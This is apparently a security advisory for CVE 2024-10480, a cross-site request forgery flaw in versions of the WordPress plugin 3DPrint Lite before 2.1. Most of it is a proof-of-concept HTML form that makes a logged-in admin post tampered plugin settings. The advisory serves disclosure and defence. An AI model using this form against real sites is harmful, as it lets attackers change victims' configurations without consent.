3DPrint Lite < 2.1 – Settings Update via CSRF | CVE 2024-10480

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

Have a logged in admin open an HTML page containing the following form:

<form action="https://example.com/wp-admin/admin.php?page=p3dlite_settings" method="post" enctype="multipart/form-data">
    <!-- Hidden inputs use the exact keys provided from the request body -->
    <!-- Name attributes must match the request field names, with brackets and quotes properly encoded -->
    <input type="hidden" name="p3dlite_settings[pricing]" value="request_estimate">
    <input type="hidden" name="p3dlite_settings[min_price]" value="1">
    <input type="hidden" name="p3dlite_settings[minimum_price_type]" value="minimum_price">
    <input type="hidden" name="p3dlite_settings[currency]" value="$HACKED$">
    <input type="hidden" name="p3dlite_settings[currency_position]" value="left">
    <input type="hidden" name="p3dlite_settings[num_decimals]" value="2">
    <input type="hidden" name="p3dlite_settings[thousand_sep]" value=",">
    <input type="hidden" name="p3dlite_settings[decimal_sep]" value=".">
    <input type="hidden" name="p3dlite_settings[price_debug_mode]" value="0">
    <input type="hidden" name="action" value="update">
    <input type="hidden" name="page_options" value="new_option_name,some_other_option,option_etc">
    <input type="hidden" name="p3dlite_settings[canvas_width]" value="999999">
    <input type="hidden" name="p3dlite_settings[canvas_height]" value="99999">
    <!-- ... More hidden inputs for each setting ... -->
  
    <!-- File input for the 'ajax_loader' field. Users must select a file manually. -->
    <input type="file" name="p3dlite_settings[ajax_loader]">
  
    <!-- Submit button. -->
    <input type="submit" value="Submit">
  </form>